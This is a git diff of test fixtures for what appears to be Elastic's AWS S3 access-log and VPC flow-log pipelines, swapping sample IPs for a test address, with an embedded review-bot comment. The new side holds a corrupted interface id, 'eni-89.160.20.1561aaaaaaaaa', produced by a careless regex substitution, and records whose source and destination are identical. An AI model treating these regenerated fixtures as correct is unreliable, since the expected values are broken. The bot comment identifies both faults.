AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION", "id": "44EE8651683CB4DA", 
@@ -83,7 +83,7 @@ "host_id": "BsCfJedfuSnds2QFoxi+E/O7M6OEWzJnw4dUaes/2hyA363sONRJKzB7EOY+Bt9DTHYUn+HoHxI=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "72.21.217.31", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 200, "total_time": 17, @@ -117,15 +117,15 @@ "preserve_original_event" ], "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -139,7 +139,7 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "72.21.217.31" + "89.160.20.156" ] }, "http": { @@ -158,8 +158,8 @@ "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, - "address": "72.21.217.31", - "ip": "72.21.217.31" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tls": { "cipher": "ECDHE-RSA-AES128-SHA", 
@@ -168,8 +168,8 @@ }, "event": { "duration": 3000000, - "ingested": "2021-07-19T21:47:05.259677600Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134198700Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:42 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 E26222010BCC32B6 REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 3 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION", "id": "E26222010BCC32B6", 
@@ -190,7 +190,7 @@ "host_id": "gNl/Q1IzY6nGTBygqI3rnMz/ZFOFwOTDpSMrNca+IcEmMAd6sCIs1ZRLYDekD8LB9lrj9UdQLWE=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "72.21.217.31", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 200, "total_time": 3, @@ -224,15 +224,15 @@ "preserve_original_event" ], "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -246,7 +246,7 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "72.21.217.31" + "89.160.20.156" ] }, "http": { @@ -265,8 +265,8 @@ "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, - "address": "72.21.217.31", - "ip": "72.21.217.31" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tls": { "cipher": "ECDHE-RSA-AES128-SHA", 
@@ -275,8 +275,8 @@ }, "event": { "duration": 2000000, - "ingested": "2021-07-19T21:47:05.259687800Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134204100Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0\u0026encoding-type=url\u0026aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.BUCKET", "id": "4DD6D17D1C5C401C", 
@@ -298,7 +298,7 @@ "host_id": "KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "72.21.217.31", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 200, "total_time": 2, @@ -332,15 +332,15 @@ "preserve_original_event" ], "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "city_name": "Ashburn", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Virginia", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -77.4728, - "lat": 39.0481 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -354,7 +354,7 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "72.21.217.31" + "89.160.20.156" ] }, "http": { @@ -373,8 +373,8 @@ "user": { "id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9" }, - "address": "72.21.217.31", - "ip": "72.21.217.31" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "tls": { "cipher": "ECDHE-RSA-AES128-SHA", 
@@ -383,8 +383,8 @@ }, "event": { "duration": 4000000, - "ingested": "2021-07-19T21:47:05.259697800Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134208400Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 89.160.20.156 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location\u0026aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "REST.GET.LOCATION", "id": "706992E2F3CC3C3D", 
@@ -405,7 +405,7 @@ "host_id": "cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "72.21.217.31", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 200, "total_time": 4, @@ -435,14 +435,14 @@ ], "geo": { "continent_name": "Europe", - "region_iso_code": "ES-TE", - "city_name": "Teruel", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Teruel", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -1.1065, - "lat": 40.3456 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { @@ -456,15 +456,15 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "77.227.156.41" + "89.160.20.156" ] }, "client": { "user": { "id": "arn:aws:iam::123456:user/test@elastic.co" }, - "address": "77.227.156.41", - "ip": "77.227.156.41" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "http": { "response": { 
@@ -477,8 +477,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-19T21:47:05.259707700Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134212900Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", "kind": "event", "action": "BATCH.DELETE.OBJECT", "id": "8CD7A4A71E2E5C9E", @@ -497,7 +497,7 @@ "host_id": "IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk=", "host_header": "s3.eu-central-1.amazonaws.com", "bucket": "jsoriano-s3-test", - "remote_ip": "77.227.156.41", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 204, "bucket_owner": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2", @@ -513,15 +513,15 @@ "preserve_original_event" ], "geo": { - "continent_name": "North America", - "region_iso_code": "US-CO", - "city_name": "Denver", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Colorado", + "continent_name": "Europe", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -105.0023, - "lat": 39.7044 + "lon": 17.8167, + "lat": 59.2 } }, "cloud": { 
@@ -535,15 +535,15 @@ "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2" ], "ip": [ - "174.29.206.152" + "89.160.20.156" ] }, "client": { "user": { "id": "arn:aws:iam::123456:user/test@elastic.co" }, - "address": "174.29.206.152", - "ip": "174.29.206.152" + "address": "89.160.20.156", + "ip": "89.160.20.156" }, "http": { "response": { @@ -556,8 +556,8 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-07-19T21:47:05.259717600Z", - "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 174.29.206.152 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", + "ingested": "2021-12-09T16:11:59.134217300Z", + "original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 89.160.20.156 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "kind": "event", "action": "BATCH.DELETE.OBJECT", "id": "6CE38F1312D32BDD", @@ -576,7 +576,7 @@ "host_id": "LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0=", "host_header": "s3.ap-southeast-1.amazonaws.com", "bucket": "test-s3-ks", - "remote_ip": "174.29.206.152", + "remote_ip": "89.160.20.156", "cipher_suite": "ECDHE-RSA-AES128-SHA", "http_status": 204, "bucket_owner": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2", 
@@ -628,7 +628,7 @@ }, "event": { "duration": 103000000, - "ingested": "2021-07-19T21:47:05.259727500Z", + "ingested": "2021-12-09T16:11:59.134221Z", "original": "67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b flow-log-test [14/Jul/2021:18:57:31 +0000] - svc:delivery.logs.amazonaws.com MVGXZXEVN3IG9S24 REST.PUT.OBJECT AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-_20210713T1855Z_f12aa632.log.gz \"PUT /AWSLogs/000000000000/vpcflowlogs/us-gov-east-1/2021/07/13/000000000000_vpcflowlogs_us-gov-east-1_fl-0e7c13bf00cf15bfe_20210713T1855Z_f12aa632.log.gz HTTP/1.1\" 200 - - 773 103 13 \"-\" \"-\" - 02SxwfXpO5UysN0GsKGa3uGDQ6E/W7+Hwo/luRH8p1VEexULoe66RCM+nja0dEq2JqLrtgjocvVRRkVt4= SigV4 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader flow-log-test.s3.us-gov-west-1.amazonaws.com TLSv1.2 -", "kind": "event", "action": "REST.PUT.OBJECT", diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log index 3024fccfc39..808ade66dcb 100644 --- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log +++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log 
@@ -1,7 +1,7 @@
-2 123456789010 eni-1235b8ca123456789 2001:db8:1234:a100:8d6e:3477:df66:f105 2001:db8:1234:a102:3304:8879:34cf:4071 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK
+2 123456789010 eni-1235b8ca123456789 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK
 2 123456789010 eni-1235b8ca123456789 - - - - - - - 1431280876 1431280934 - NODATA
-2 123456789010 eni-11111111aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA
-2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK
-2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK
-2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK
-2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK
\ No newline at end of file
+2 123456789010 eni-89.160.20.1561aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA
+2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK
+2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK
+2 123456789010 eni-1235b8ca123456789 89.160.20.156 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK
+2 123456789010 eni-1235b8ca123456789 172.31.16.139 89.160.20.156 0 0 1 4 336 1432917094 1432917142 REJECT OK
\ No newline at end of file
diff --git a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json
index 9ddf227c12e..77a00b72a08 100644
--- a/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json
+++ b/packages/aws/data_stream/vpcflow/_dev/test/pipeline/test-extra-samples.log-expected.json
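Review bot: The SKIPDATA record on the new side now reads `eni-89.160.20.1561aaaaaaaaa`, which is not a valid interface id and was not meant to change; it looks like the substitution was done with an unescaped pattern, since `1.1.1.1` as a regex matches the first seven characters of `11111111` and leaves the trailing `1aaaaaaaaa` behind. That line should stay `2 123456789010 eni-11111111aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA` (unchanged, i.e. a context line), and test-extra-samples.log-expected.json regenerated, because its hunks `@@ -104,8 +134,8 @@` and `@@ -116,7 +146,7 @@` pin the corrupted value in `event.original` and `vpcflow.interface_id`. Separately, the IPv6 record and both ACCEPT/REJECT records now carry the same address as source and destination, so the regenerated `related.ip` arrays in hunks `@@ -36,13 +66,13 @@`, `@@ -193,13 +226,13 @@` and `@@ -286,13 +322,13 @@` hold the same address twice and the source and destination geo/AS enrichment can no longer be told apart; giving the destination a second address from the supported subset keeps those assertions meaningful. If the duplicate entry in `related.ip` is not intended pipeline output, the append step presumably needs `allow_duplicates: false` — the pipeline itself is not part of this diff, so I cannot confirm that.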
@@ -2,22 +2,52 @@ "expected": [ { "destination": { + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 22, - "address": "2001:db8:1234:a102:3304:8879:34cf:4071", - "ip": "2001:db8:1234:a102:3304:8879:34cf:4071" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { - "address": "2001:db8:1234:a100:8d6e:3477:df66:f105", + "geo": { + "continent_name": "Europe", + "country_name": "Denmark", + "location": { + "lon": 10.0, + "lat": 56.0 + }, + "country_iso_code": "DK" + }, + "as": { + "number": 62121, + "organization": { + "name": "Christian Ebsen ApS" + } + }, + "address": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "port": 34892, "bytes": 8855, - "packets": 54, - "ip": "2001:db8:1234:a100:8d6e:3477:df66:f105" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "packets": 54 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:hXZclvxUJScaVf0xMIJR6yW6tBQ=", + "community_id": "1:3piNHoW0DjbrWkF//BeRomCaOZQ=", "transport": "tcp", "type": "ipv6", "bytes": 8855, 
@@ -36,13 +66,13 @@ }, "related": { "ip": [ - "2001:db8:1234:a100:8d6e:3477:df66:f105", - "2001:db8:1234:a102:3304:8879:34cf:4071" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075027100Z", - "original": "2 123456789010 eni-1235b8ca123456789 2001:db8:1234:a100:8d6e:3477:df66:f105 2001:db8:1234:a102:3304:8879:34cf:4071 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK", + "ingested": "2021-12-09T16:12:00.503382700Z", + "original": "2 123456789010 eni-1235b8ca123456789 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6 34892 22 6 54 8855 1477913708 1477913820 ACCEPT OK", "kind": "event", "start": "2016-10-31T11:35:08.000Z", "end": "2016-10-31T11:37:00.000Z", @@ -72,7 +102,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-28T19:10:43.075037500Z", + "ingested": "2021-12-09T16:12:00.503391600Z", "original": "2 123456789010 eni-1235b8ca123456789 - - - - - - - 1431280876 1431280934 - NODATA", "kind": "event", "start": "2015-05-10T18:01:16.000Z", @@ -104,8 +134,8 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-09-28T19:10:43.075045100Z", - "original": "2 123456789010 eni-11111111aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA", + "ingested": "2021-12-09T16:12:00.503397800Z", + "original": "2 123456789010 eni-89.160.20.1561aaaaaaaaa - - - - - - - 1431280876 1431280934 - SKIPDATA", "kind": "event", "start": "2015-05-10T18:01:16.000Z", "end": "2015-05-10T18:02:14.000Z", @@ -116,7 +146,7 @@ "vpcflow": { "account_id": "123456789010", "log_status": "SKIPDATA", - "interface_id": "eni-11111111aaaaaaaaa", + "interface_id": "eni-89.160.20.1561aaaaaaaaa", "version": "2" } }, 
@@ -128,53 +158,56 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Spain", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13041, + "number": 29518, "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" + "name": "Bredband2 AB" } }, - "address": "158.109.0.1", + "address": "89.160.20.156", "port": 22, - "ip": "158.109.0.1" + "ip": "89.160.20.156" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 35377, + "number": 29518, "organization": { - "name": "Ao a.b.n." + "name": "Bredband2 AB" } }, - "address": "78.24.182.42", + "address": "89.160.20.156", "port": 20641, "bytes": 4249, - "ip": "78.24.182.42", + "ip": "89.160.20.156", "packets": 20 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Ln/vlDqu658GHymxjnRAaUF8KS4=", + "community_id": "1:CEGBlG6oEeW2Y5LLdr9GONITz00=", "transport": "tcp", "type": "ipv4", "bytes": 4249, 
@@ -193,13 +226,13 @@ }, "related": { "ip": [ - "78.24.182.42", - "158.109.0.1" + "89.160.20.156", + "89.160.20.156" ] }, "event": { - "ingested": "2021-09-28T19:10:43.075052500Z", - "original": "2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", + "ingested": "2021-12-09T16:12:00.503403700Z", + "original": "2 123456789010 eni-1235b8ca123456789 89.160.20.156 89.160.20.156 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK", "kind": "event", "start": "2014-12-14T04:06:50.000Z", "end": "2014-12-14T04:07:50.000Z", 
@@ -221,53 +254,56 @@ "destination": { "geo": { "continent_name": "Europe", - "country_name": "Spain", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": -3.684, - "lat": 40.4172 - }, - "country_iso_code": "ES" + "lon": 17.8167, + "lat": 59.2 + } }, "as": { - "number": 13041, + "number": 29518, "organization": { - "name": "Consorci de Serveis Universitaris de Catalunya" + "name": "Bredband2 AB" } }, - "address": "158.109.0.1", + "address": "89.160.20.156", "port": 3389, - "ip": "158.109.0.1" + "ip": "89.160.20.156" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "SE-AB", + "city_name": "Tumba", + "country_iso_code": "SE", + "country_name": "Sweden", + "region_name": "Stockholm", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": 17.8167, + "lat": 59.2 } }, "as": { - "number": 35377, + "number": 29518, "organization": { - "name": "Ao a.b.n." + "name": "Bredband2 AB" } }, - "address": "78.24.182.42", + "address": "89.160.20.156", "port": 49761, "bytes": 4249, - "ip": "78.24.182.42", + "ip": "89.160.20.156", "packets": 20 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:E3lDDGXG7D8azpdrN7WMLPJe30w=", + "community_id": "1:va8LK/uEqYpj4NoZ9/5WRLio5rs=", "transport": "tcp", "type": "ipv4", "bytes": 4249, 
